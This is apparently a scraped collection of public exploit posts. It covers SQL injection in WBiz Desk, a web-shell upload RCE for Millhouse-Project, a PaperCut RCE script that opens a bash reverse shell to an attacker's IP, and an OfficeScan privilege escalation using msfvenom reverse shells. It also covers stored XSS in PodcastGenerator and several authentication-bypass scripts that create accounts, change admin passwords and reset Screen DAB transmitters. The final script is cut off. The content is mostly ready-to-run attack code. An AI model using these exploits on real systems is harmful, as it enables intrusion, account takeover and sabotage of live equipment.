ISHACK AI BOT

[#] Exploit Title: WBiz Desk 1.2 - SQL Injection [#] Exploit Date: May 12, 2023. [#] CVSS 3.1: 6.4 (Medium) [#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N [#] Tactic: Initial Access (TA0001) [#] Technique: Exploit Public-Facing Application (T1190) [#] Application Name: WBiz Desk [#] Application Version: 1.2 [#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system [#] Author: h4ck3r - Faisal Albuloushi [#] Contact: [email protected] [#] Blog: https://www.0wl.tech [#] 3xploit: [path]//ticket.php?tk=[SQL Injection] [#] 3xample: [path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- - [#] Notes: - The vulnerability requires a non-admin privilege (normal) user to be exploited.

<?php /* Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution Date: 12/05/2023 Exploit Author: Chokri Hammedi Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project Software Link: https://github.com/thrsrossi/Millhouse-Project.git Version: 1.414 Tested on: Debian CVE: N/A */ $options = getopt('u:c:'); if(!isset($options['u'], $options['c'])) die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi \n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n \033[0m\n \n"); $target = $options['u']; $command = $options['c']; $url = $target . '/includes/add_post_sql.php'; $post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="title" helloworld ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="description" <p>sdsdsds</p> ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="category" 1 ------WebKitFormBoundaryzlHN0BEvvaJsDgh8 Content-Disposition: form-data; name="image"; filename="rose.php" Content-Type: application/x-php <?php $shell = shell_exec("' . $command . '"); echo $shell; ?> ------WebKitFormBoundaryzlHN0BEvvaJsDgh8-- '; $headers = array( 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8', 'Cookie: PHPSESSID=rose1337', ); $ch = curl_init($url); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); $response = curl_exec($ch); curl_close($ch); // execute command $shell = "{$target}/images/rose.php?cmd=" . urlencode($command); $ch = curl_init($shell); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $exec_shell = curl_exec($ch); curl_close($ch); echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n"; ?>

# Exploit Title: PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE) # Date: 13 May 2023 # Exploit Author: Mohin Paramasivam (Shad0wQu35t) and MaanVader # Vendor Homepage: https://www.papercut.com/ # Version: 8.0 or later # Tested on: 22.0.4 # CVE: CVE-2023-27350 import requests import argparse Group_payload = { "service":"direct/1/OptionsUserSync/$OptionsUserSource.$Form", "sp":"S0", "Form0":"$Hidden,$Hidden$0,$Hidden$1,$PropertySelection,$Hidden$2,$Hidden$3,$Hidden$4,$Hidden$5,$Hidden$6,$Hidden$7,$Hidden$8,$Hidden$9,$Hidden$10,$Hidden$11,$Hidden$12,$Hidden$13,$Hidden$14,$TextField,$TextField$0,$RadioGroup,$Submit,$Checkbox$2,primaryCardIdLength,$Checkbox$3,secondaryCardIdLength,$Checkbox$5,$Hidden$15,$Hidden$16,$Hidden$17,$Hidden$18,$Hidden$19,$Hidden$20,$Hidden$21,$PropertySelection$4,$TextField$13,$Checkbox$6,$TextField$14,$TextField$15,$TextField$16,$RadioGroup$0,$Submit$1,$PropertySelection$5,$TextField$17,$PropertySelection$6,$TextField$18,primaryCardId2Length,$PropertySelection$7,$TextField$19,secondaryCardId2Length,$Checkbox$7,$TextField$20,$Checkbox$8,$Checkbox$9,$Checkbox$10,$Submit$2,$Submit$3,$Submit$4,$Submit$5", "$Hidden":"Sf278fd737ffcaed6eb3d1f67c2ba5c6d", "$Hidden$0":"F", "$Hidden$1":"F", "$Hidden$2":"OH4sIAAAAAAAAAJWQwUrDQBCGp60VBBUp4lWRnncRPIjSg4iHwrYNpBU8xXW7JitJdp1sis2hF5_BlxBP-lw-gF50Y2Mp6MW5DTP_fP8_z2_QzBDotSqI4UaiyC0xIg1JJnGihCQDY5VOs5HrfZ2jkMOpkVeHny8bD8VeHVa6sBYYVBqVnTLYCnhuIw91iDzxuI0stNgtn3Aa8zSkvkWVhies1MTc3mhMLBwzR6c_dFrSaUWnf9LbXqV1h3aCfDFbwt7BDGr3CO3fwXKrYsK04LEq5Pg8zZPex26j87i-XQdwkn2NIeGGi0gSoZPE4Ulpnki3mpFS8N556r4eXBR1qDFoqj5P5BxoLKyejfzhoAcAYzNDOPrnZxfZoKrWt6nN8odzG6WB5aFjNk77l-YLeZfbs8sBAAA.", "$Hidden$3":"F", "$Hidden$4":"X", "$Hidden$5":"X", "$Hidden$6":"X", "$Hidden$7":"X", "$Hidden$8":"X", "$Hidden$9":"X", "$Hidden$10":"X", "$Hidden$11":"X", "$Hidden$12":"X", "$Hidden$13":"F", "$Hidden$14":"X", "$Hidden$15":"F", "$Hidden$16":"S", "$Hidden$17":"S", "$Hidden$18":"S", "$Hidden$19":"S", "$Hidden$20":"F", "$Hidden$21":"SSTANDARD_UNIX", "$PropertySelection":"3,CUSTOM", "$TextField":"/usr/bin/python3", "$TextField$0":"/usr/bin/python3", "$RadioGroup":"0", "primaryCardIdLength":"8", "secondaryCardIdLength":"8", "$PropertySelection$4":"0,STANDARD_UNIX", "$TextField$13":"", "$TextField$14":"", "$TextField$15":"", "$TextField$16":"", "$RadioGroup$0":"0", "$PropertySelection$5":"NONE", "$TextField$17":"", "$PropertySelection$6":"NONE", "$TextField$18":"employeeNumber", "primaryCardId2Length":"8", "$PropertySelection$7":"NONE", "$TextField$19":"", "secondaryCardId2Length":"8", "$TextField$20":"", "$Submit$4":"Apply" } parser = argparse.ArgumentParser(description="Papercut RCE") parser.add_argument('--url',help='Url of the vunerable application example http://10.2.3.4:9191 dont need the trailing /') parser.add_argument('--ip',help='our rev shell ip') parser.add_argument('--port',help='our rev shell port') args = parser.parse_args() url = args.url ip = args.ip port = args.port passwd_input = f"import os;os.system(\"/bin/bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'\")" final_payload = { "service":"direct/1/Home/$Form$0", "sp":"S0", "Form0":"$Hidden$0,$Hidden$1,inputUsername,inputPassword,$PropertySelection$0,$Submit$0", "$Hidden$0":"true", "$Hidden$1":"X", "inputUsername":"help", "inputPassword":passwd_input, "$PropertySelection$0":"en", "$Submit$0":"Log+in" } # create a session session = requests.Session() # visit the first URL to set up the session setup_url = url+"/app?service=page/SetupCompleted" response = session.get(setup_url) response.raise_for_status() # check for any errors # visit the second URL using the same session dashboard_url = url+"/app?service=page/Dashboard" response = session.get(dashboard_url) response.raise_for_status() # check for any errors # URL to change user group user_group_change_url = url+"/app" response = session.post(user_group_change_url,data=Group_payload) response.raise_for_status() # check for errors # URL to gain RCE rce_url = url+"/app" response = session.post(rce_url,data=final_payload) response.raise_for_status() # Check for any errors # print the response text print(response.text)

# Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE # Date: 2023/05/04 # Exploit Author: msd0pe # Vendor Homepage: https://www.trendmicro.com # My Github: https://github.com/msd0pe-1 Trend Micro OfficeScan Client: Versions =< 10.0 contains wrong ACL rights on the OfficeScan client folder which allows attackers to escalate privileges to the system level through the services. This vulnerabily does not need any privileges access. [1] Verify the folder rights: > icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client" C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F) NT SERVICE\TrustedInstaller:(CI)(IO)(F) NT AUTHORITY\SYSTEM:(F) NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F) BUILTIN\Administrators:(F) BUILTIN\Administrators:(OI)(CI)(IO)(F) BUILTIN\Users:(F) BUILTIN\Users:(OI)(CI)(IO)(F) CREATOR OWNER:(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO) [2] Get informations about the services: > sc qc tmlisten [SC] QueryServiceConfig SUCCESS SERVICE_NAME: tmlisten TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OfficeScan NT Listener DEPENDENCIES : Netman : WinMgmt SERVICE_START_NAME : LocalSystem OR > sc qc ntrtscan SERVICE_NAME: ntrtscan TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OfficeScan NT RealTime Scan DEPENDENCIES : SERVICE_START_NAME : LocalSystem [3] Generate a reverse shell: > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe OR > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe [4] Upload the reverse shell to C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe [5] Start listener > nc -lvp 4444 [6] Reboot the service/server > sc stop tmlisten > sc start tmlisten OR > sc stop ntrtscan > sc start ntrtscan OR > shutdown /r [7] Enjoy ! 192.168.1.102: inverse host lookup failed: Unknown host connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 Microsoft Windows [Version 10.0.19045.2130] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system

#Exploit Title: PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS) #Application: PodcastGenerator #Version: v3.2.9 #Bugs: Stored Xss #Technology: PHP #Vendor URL: https://podcastgenerator.net/ #Software Link: https://github.com/PodcastGenerator/PodcastGenerator #Date of found: 14-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: #########XSS -1############## 1.go to 'Episodes' then 'Upload New Episodes'(http://localhost/PodcastGenerator/admin/episodes_upload.php) 2.set title section as <img src=1 onerror=alert("XSS-1")> 3.And go to 'View All Episoded'(http://localhost/PodcastGenerator/admin/episodes_list.php) payload: <img src=1 onerror=alert("XSS-1")> poc- request: POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1 Host: localhost Content-Length: 8307 Cache-Control: max-age=0 sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3NXAbhxohxCgUFNi User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn Connection: close ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="file"; filename="2023-05-13_2_images.jpeg" Content-Type: image/jpeg image content asdfasdfasdfasdfasdfasdfasdfa ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="title" <img src=1 onerror=alert("XSS-1")> ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="shortdesc" fffff ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="date" 2023-05-14 ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="time" 11:05 ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="episodecover"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="longdesc" ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="episodenum" ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="seasonnum" ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="itunesKeywords" ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="explicit" yes ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="authorname" ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="authoremail" ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="customtags" ------WebKitFormBoundary3NXAbhxohxCgUFNi Content-Disposition: form-data; name="token" 6GnmEMNnhFfyNeTRciGsh8p4R4djazh8 ------WebKitFormBoundary3NXAbhxohxCgUFNi-- #########XSS -2############## 1.go to "Themes and aspect" then "Customize your Freebox" (http://localhost/PodcastGenerator/admin/theme_freebox.php) 2. set Freebox content as <script>alert("XSS-2")</script> 3.go to home page (http://localhost/PodcastGenerator/) payload: <script>alert("XSS-2")</script> poc Request: POST /PodcastGenerator/admin/theme_freebox.php?change=1 HTTP/1.1 Host: localhost Content-Length: 96 Cache-Control: max-age=0 sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/PodcastGenerator/admin/theme_freebox.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn Connection: close content=%3Cscript%3Ealert%28%22XSS-2%22%29%3C%2Fscript%3E&token=6GnmEMNnhFfyNeTRciGsh8p4R4djazh8 #########XSS -3############## 1. go to "Podcast Details" then "Change Podcast Details" (http://localhost/PodcastGenerator/admin/podcast_details.php) 2. set "Podcast tile " as <svg/onload=prompt("XSS-3")> 3.go to home page (http://localhost/PodcastGenerator/) payload: <svg/onload=prompt("XSS-3")> poc-request: POST /PodcastGenerator/admin/podcast_details.php?edit=1 HTTP/1.1 Host: localhost Content-Length: 300 Cache-Control: max-age=0 sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/PodcastGenerator/admin/podcast_details.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn Connection: close podcast_title=%3Csvg%2Fonload%3Dprompt%28%22XSS-3%22%29%3E&podcast_subtitle=dd&podcast_description=dd&copyright=dd&author_name=Podcast+Generator+UserP&author_email=podcastgenerator%40example.com&podcast_guid=&feed_language=en&explicit_podcast=yes&feed_locked=no&token=xVrlAT6NG2ZrbGanycblGYoOOIitXXKC

#!/usr/bin/env python3 # Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Account Creation # Exploit Author: LiquidWorm # # # Vendor: DB Elettronica Telecomunicazioni SpA # Product web page: https://www.screen.it | https://www.dbbroadcast.com # https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ # Affected version: Firmware: 1.9.3 # Bios firmware: 7.1 (Apr 19 2021) # Gui: 2.46 # FPGA: 169.55 # uc: 6.15 # # Summary: Screen's new radio DAB Transmitter is reaching the highest # technology level in both Digital Signal Processing and RF domain. # SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the # digital adaptive precorrection and configuatio flexibility, the Hot # Swap System technology, the compactness and the smart system design, # the SFT DAB are advanced transmitters. They support standards DAB, # DAB+ and T-DMB and are compatible with major headend brands. # # Desc: The application suffers from a weak session management that can # allow an attacker on the same network to bypass these controls by reusing # the same IP address assigned to the victim user (NAT) and exploit crucial # operations on the device itself. By abusing the IP address property that # is binded to the Session ID, one needs to await for such an established # session and issue unauthorized requests to the vulnerable API to manage # and/or manipulate the affected transmitter. # # Tested on: Keil-EWEB/2.1 # MontaVista® Linux® Carrier Grade eXpress (CGX) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5771 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5771.php # # # 19.03.2023 # import hashlib,datetime########## import requests,colorama######### from colorama import Fore, Style# colorama.init() print(Fore.RED+Style.BRIGHT+ ''' ██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ ██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ ''' +Style.RESET_ALL) print(Fore.WHITE+Style.BRIGHT+ ''' ZSL and the Producers insist that no one submit any exploits of themselfs or others performing any dangerous activities. We will not open or view them. ''' +Style.RESET_ALL) s=datetime.datetime.now() s=s.strftime('%d.%m.%Y %H:%M:%S') print('Starting API XPL -',s) t=input('Enter transmitter ip: ') u=input('Enter desired username: ') p=input('Enter desired password: ') e='/system/api/userManager.cgx' m5=hashlib.md5() m5.update(p.encode('utf-8')) h=m5.hexdigest() print('Your sig:',h) print('Calling object: ssbtObj') print('CGX fastcall: userManager::newUser') t='http://'+t+e bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Accept':'application/json, text/plain, */*', 'Accept-Language':'ku-MK,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Dabber++', 'Connection':'close'} j={'ssbtIdx':0, 'ssbtType':'userManager', 'ssbtObj':{ 'newUser':{ 'password':h, 'type':'OPERATOR', 'username':u } }, } r=requests.post(t,headers=bh,json=j) if r.status_code==200: print('Done.') else: print('Error') exit(-5)

#!/usr/bin/env python3 # # Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Password Change # Exploit Author: LiquidWorm # # # Vendor: DB Elettronica Telecomunicazioni SpA # Product web page: https://www.screen.it | https://www.dbbroadcast.com # https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ # Affected version: Firmware: 1.9.3 # Bios firmware: 7.1 (Apr 19 2021) # Gui: 2.46 # FPGA: 169.55 # uc: 6.15 # # Summary: Screen's new radio DAB Transmitter is reaching the highest # technology level in both Digital Signal Processing and RF domain. # SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the # digital adaptive precorrection and configuatio flexibility, the Hot # Swap System technology, the compactness and the smart system design, # the SFT DAB are advanced transmitters. They support standards DAB, # DAB+ and T-DMB and are compatible with major headend brands. # # Desc: The application suffers from a weak session management that can # allow an attacker on the same network to bypass these controls by reusing # the same IP address assigned to the victim user (NAT) and exploit crucial # operations on the device itself. By abusing the IP address property that # is binded to the Session ID, one needs to await for such an established # session and issue unauthorized requests to the vulnerable API to manage # and/or manipulate the affected transmitter. # # Tested on: Keil-EWEB/2.1 # MontaVista® Linux® Carrier Grade eXpress (CGX) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5772 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php # # # 19.03.2023 # import hashlib,datetime########## import requests,colorama######### from colorama import Fore, Style# colorama.init() print(Fore.RED+Style.BRIGHT+ ''' ██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ ██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ ''' +Style.RESET_ALL) print(Fore.WHITE+Style.BRIGHT+ ''' ZSL and the Producers insist that no one submit any exploits of themselfs or others performing any dangerous activities. We will not open or view them. ''' +Style.RESET_ALL) s=datetime.datetime.now() s=s.strftime('%d.%m.%Y %H:%M:%S') print('Starting API XPL -',s) t=input('Enter transmitter ip: ') u=input('Enter desired username: ') p=input('Enter desired password: ') e='/system/api/userManager.cgx' m5=hashlib.md5() m5.update(p.encode('utf-8')) h=m5.hexdigest() print('Your sig:',h) print('Calling object: ssbtObj') print('CGX fastcall: userManager::changeUserPswd') t='http://'+t+e bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Accept':'application/json, text/plain, */*', 'Accept-Language':'ku-MK,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Dabber+', 'Connection':'close'} j={'ssbtIdx':0, 'ssbtType':'userManager', 'ssbtObj':{ 'changeUserPswd':{ 'username':u, 'password':h } }, } r=requests.post(t,headers=bh,json=j) if r.status_code==200: print('Done.') else: print('Error') exit(-4)

#!/usr/bin/env python3 # # Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Erase Account # Exploit Author: LiquidWorm # # # Vendor: DB Elettronica Telecomunicazioni SpA # Product web page: https://www.screen.it | https://www.dbbroadcast.com # https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ # Affected version: Firmware: 1.9.3 # Bios firmware: 7.1 (Apr 19 2021) # Gui: 2.46 # FPGA: 169.55 # uc: 6.15 # # Summary: Screen's new radio DAB Transmitter is reaching the highest # technology level in both Digital Signal Processing and RF domain. # SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the # digital adaptive precorrection and configuatio flexibility, the Hot # Swap System technology, the compactness and the smart system design, # the SFT DAB are advanced transmitters. They support standards DAB, # DAB+ and T-DMB and are compatible with major headend brands. # # Desc: The application suffers from a weak session management that can # allow an attacker on the same network to bypass these controls by reusing # the same IP address assigned to the victim user (NAT) and exploit crucial # operations on the device itself. By abusing the IP address property that # is binded to the Session ID, one needs to await for such an established # session and issue unauthorized requests to the vulnerable API to manage # and/or manipulate the affected transmitter. # # Tested on: Keil-EWEB/2.1 # MontaVista® Linux® Carrier Grade eXpress (CGX) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5773 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5773.php # # # 19.03.2023 # import hashlib,datetime########## import requests,colorama######### from colorama import Fore, Style# colorama.init() print(Fore.RED+Style.BRIGHT+ ''' ██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ ██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ ''' +Style.RESET_ALL) print(Fore.WHITE+Style.BRIGHT+ ''' ZSL and the Producers insist that no one submit any exploits of themselfs or others performing any dangerous activities. We will not open or view them. ''' +Style.RESET_ALL) s=datetime.datetime.now() s=s.strftime('%d.%m.%Y %H:%M:%S') print('Starting API XPL -',s) t=input('Enter transmitter ip: ') u=input('Enter desired username: ') e='/system/api/userManager.cgx' print('Calling object: ssbtObj') print('CGX fastcall: userManager::removeUser') t='http://'+t+e bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Accept':'application/json, text/plain, */*', 'Accept-Language':'ku-MK,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Dabber-', 'Connection':'close'} j={'ssbtIdx':0, 'ssbtType':'userManager', 'ssbtObj':{ 'removeUser':u } } r=requests.post(t,headers=bh,json=j) if r.status_code==200: print('Done.') else: print('Error') exit(-3)

#!/usr/bin/env python3 # # Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Admin Password Change # Exploit Author: LiquidWorm # # # Vendor: DB Elettronica Telecomunicazioni SpA # Product web page: https://www.screen.it | https://www.dbbroadcast.com # https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ # Affected version: Firmware: 1.9.3 # Bios firmware: 7.1 (Apr 19 2021) # Gui: 2.46 # FPGA: 169.55 # uc: 6.15 # # Summary: Screen's new radio DAB Transmitter is reaching the highest # technology level in both Digital Signal Processing and RF domain. # SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the # digital adaptive precorrection and configuatio flexibility, the Hot # Swap System technology, the compactness and the smart system design, # the SFT DAB are advanced transmitters. They support standards DAB, # DAB+ and T-DMB and are compatible with major headend brands. # # Desc: This exploit circumvents the control and requirement of admin's # old password and directly changes the password. # # Tested on: Keil-EWEB/2.1 # MontaVista® Linux® Carrier Grade eXpress (CGX) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5774 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php # # # 19.03.2023 # import hashlib,datetime########## import requests,colorama######### from colorama import Fore, Style# colorama.init() print(Fore.RED+Style.BRIGHT+ ''' ██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ ██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ ''' +Style.RESET_ALL) print(Fore.WHITE+Style.BRIGHT+ ''' ZSL and the Producers insist that no one submit any exploits of themselfs or others performing any dangerous activities. We will not open or view them. ''' +Style.RESET_ALL) s=datetime.datetime.now() s=s.strftime('%d.%m.%Y %H:%M:%S') print('Starting API XPL -',s) t=input('Enter transmitter ip: ') p=input('Enter desired password: ') e='/system/api/userManager.cgx' m5=hashlib.md5() m5.update(p.encode('utf-8')) h=m5.hexdigest() print('Your sig:',h) print('Calling object: ssbtObj') print('CGX fastcall: userManager::changeUserPswd') t='http://'+t+e bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Accept':'application/json, text/plain, */*', 'Accept-Language':'ku-MK,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Dabber-+', 'Connection':'close'} j={'ssbtIdx':0, 'ssbtType':'userManager', 'ssbtObj':{ 'changeUserPswd':{ 'username':'admin', 'password':h } }, } r=requests.post(t,headers=bh,json=j) if r.status_code==200: print('Done.') else: print('Error') exit(-2)

#!/usr/bin/env python3 # # Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Reset Board Config # Exploit Author: LiquidWorm # # # Vendor: DB Elettronica Telecomunicazioni SpA # Product web page: https://www.screen.it | https://www.dbbroadcast.com # https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ # Affected version: Firmware: 1.9.3 # Bios firmware: 7.1 (Apr 19 2021) # Gui: 2.46 # FPGA: 169.55 # uc: 6.15 # # Summary: Screen's new radio DAB Transmitter is reaching the highest # technology level in both Digital Signal Processing and RF domain. # SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the # digital adaptive precorrection and configuatio flexibility, the Hot # Swap System technology, the compactness and the smart system design, # the SFT DAB are advanced transmitters. They support standards DAB, # DAB+ and T-DMB and are compatible with major headend brands. # # Desc: The application suffers from a weak session management that can # allow an attacker on the same network to bypass these controls by reusing # the same IP address assigned to the victim user (NAT) and exploit crucial # operations on the device itself. By abusing the IP address property that # is binded to the Session ID, one needs to await for such an established # session and issue unauthorized requests to the vulnerable API to manage # and/or manipulate the affected transmitter. # # Tested on: Keil-EWEB/2.1 # MontaVista® Linux® Carrier Grade eXpress (CGX) # # # Vulnerability discovered by Gjoko 